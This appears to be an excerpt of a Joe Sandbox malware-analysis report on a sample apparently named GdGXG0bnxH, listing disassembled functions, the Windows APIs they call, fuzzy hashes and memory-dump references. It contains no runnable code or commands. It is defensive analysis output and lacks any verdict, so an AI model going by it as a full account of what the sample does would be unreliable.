  • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85078
  • Part of subcall function 00007FF7E6E85050: SizeofResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85089
  • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850AF
  • Part of subcall function 00007FF7E6E85050: LoadResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850C0
  • Part of subcall function 00007FF7E6E85050: LockResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850CF
  • Part of subcall function 00007FF7E6E85050: memcpy_s.MSVCRT ref: 00007FF7E6E850EE
  • Part of subcall function 00007FF7E6E85050: FreeResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850FD
• LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7E6E83388), ref: 00007FF7E6E84975
• LocalFree.KERNEL32(?,?,?,?,00000000,00007FF7E6E83388), ref: 00007FF7E6E84A11
  • Part of subcall function 00007FF7E6E84DCC: LoadStringA.USER32 ref: 00007FF7E6E84E60
  • Part of subcall function 00007FF7E6E84DCC: MessageBoxA.USER32 ref: 00007FF7E6E84EA0
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
• String ID: <None>$@$FINISHMSG
• API String ID: 3507850446-4126004490
• Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
• Instruction ID: 54521182c9d5110f4fdc4fd074c55d517feb2b12484ad70945bbf0890b56ae57
• Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
• Instruction Fuzzy Hash: C1119272A28382C7F720AB24E81077BF690FB85B54F889136DA8E4A7C5DF3CD0048B15
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: LibraryLoad$AttributesFile
• String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$advpack.dll
• API String ID: 438848745-726598030
• Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
• Instruction ID: 9ab2452c5e4232f2167eb21e7eb301d8e928a1143b7e5edff3e9556ff84574ce
• Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
• Instruction Fuzzy Hash: B0115E31A296C685EE21AB14E8413FAB7A0FB89F04FC80272C5DD0A6D1DF3DD60AC711
APIs
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
• String ID:
• API String ID: 1273765764-0
• Opcode ID: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
• Instruction ID: e8c5831a7ee5fe75c1baa9f8ed2dfbb7ee9c16109b1170992d342e4c606dde37
• Opcode Fuzzy Hash: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
• Instruction Fuzzy Hash: 0F116371E28BC686EA506B54B8083BAE760FB89F55F884232C99E0A7D5CF3CD0458761
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
• String ID: Adv
• API String ID: 2312377310-921584719
• Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
• Instruction ID: 6aed14fc4e8649de80867d62084f698e5fc62102748f2030b41bcd7e96c3f79c
• Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
• Instruction Fuzzy Hash: C6A1A632E392C286F760AB519C4437BF664BB64F50F990037E98D4B2D1DA3CE8458B62
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
• API String ID: 1065093856-1955631000
• Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
• Instruction ID: b4a00fa44196c8eb9ee0512161097b4d66458a195fb2d3bd48c589c47967d134
• Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
• Instruction Fuzzy Hash: F83163726286C186EB119F10E8457AAFB60FB89BA4F884236DADD4B7D4CF7CD404C721
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
• Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
Similarity
• API ID:
• String ID: *MEMCAB
• API String ID: 0-3211172518
• Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
• Instruction ID: d06406aede54dc933e1b0eb331425aa6a1c52d70f5b6339bde93af309cefa9ee
                                                                                                        • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                        • Instruction Fuzzy Hash: BD313C31A28B8185EA90AB11E8483BBB3E1FB44F50FD94237D99D4A2D1EF3CD445CB52
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                        • String ID:
                                                                                                        • API String ID: 140117192-0
                                                                                                        • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                        • Instruction ID: 75d9d4b197f3664e5b461eeda3edb1d7d0a602988865577e80ffbe251670021a
                                                                                                        • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                        • Instruction Fuzzy Hash: 1241F835A28F8181EA10AB18FC81366A364FB89F94F980137D9CD4B7A4DF3CD445C721
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Char$Prev$Next
                                                                                                        • String ID:
                                                                                                        • API String ID: 3260447230-0
                                                                                                        • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                        • Instruction ID: 22b35d18be49a49cb5c382ff5bd9aa818200831d97d200382697251367a35c79
                                                                                                        • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                        • Instruction Fuzzy Hash: 31118262E186C185EB515B15A90037AEE91B74EFE1F8D8231DA9A0B7C5CE3C98408722
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                        • String ID:
                                                                                                        • API String ID: 140117192-0
                                                                                                        • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                        • Instruction ID: b4f655cc5a888ae784f6f53601711df227f1847588b1973735fe2d6960860008
                                                                                                        • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                        • Instruction Fuzzy Hash: 2721D235928F8181E610AB48FC8536AB3A4FB8AF54F940036DA8D4BBA4DF3CD445C762
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2776232527-0
                                                                                                        • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                        • Instruction ID: ee203fa430673b151c158903ab8536e159a1fff382111c01afdc2646a1e8baba
                                                                                                        • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                        • Instruction Fuzzy Hash: 1411AB72A28AC287E7606F64E844B77FA90FB95B45FC49132D68A469C4DF3CD448CB11
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.1892400896.00007FFAAC440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC440000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ffaac440000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                        • Instruction ID: 39c2d45f030bbd8e0f6522fcde3179c4b25a012a28dbc5aa610eb032179fb1be
                                                                                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                        • Instruction Fuzzy Hash: 9501677111CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3665D636E882CB45